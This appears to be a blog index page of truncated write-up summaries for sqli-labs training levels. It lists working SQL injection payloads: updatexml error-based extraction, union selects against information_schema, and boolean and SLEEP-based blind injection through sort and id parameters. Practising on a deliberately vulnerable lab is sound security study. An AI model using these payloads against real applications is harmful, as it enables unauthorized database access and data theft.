摘要:
1.参考Less(46),单引号闭合 2.爆破 (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select gro 阅读全文
摘要:
1.参考 Less(46),数字型 2.爆破: (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0)) (2)爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_con 阅读全文
摘要:
1.参考Less(46) 2.时间盲注 阅读全文
摘要:
1.参考Less(46) 2.盲注 (1)布尔盲注:?sort=1 ^(select(select version()) regexp '^0') (2)时间盲注:?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test)) 阅读全文
摘要:
1.参看Less(46),闭合为单引号 2.爆破: (1)爆库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0)) --+ (2)爆表:?sort=1' and(updatexml(1,concat(0x7e,(select g 阅读全文
摘要:
1.看一下php (1)用order by 注入来看看 (2)通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入 ?sort=1+asc ?sort=1+desc 2.报错注入 (1)爆库:?sort=1 and(updatexml(1,concat(0x7e,(sel 阅读全文
摘要:
1.参考Less(38),这次变成数字型 2.爆破 (1)爆库:?id=1 and 1=2 union select 1,2,database() -- - (2)爆表:?id=1 and 1=2 union select 1,group_concat(table_name),3 from info 阅读全文
摘要:
1.参考Less(38),在单引号后加括号; 2.爆破 (1)爆库:?id=1') and 1=2 union select 1,database(),3-- - (2)爆表:?id=1') and 1=2 union select 1,group_concat(table_name),3 from 阅读全文
摘要:
1.和Less(38)差不多 2.爆破 (1)爆库:?id=0%9 union select 1,2,database() %23 (2)爆表:?id=0%9 union select 1,group_concat(table_name),3 from information_schema.tabl 阅读全文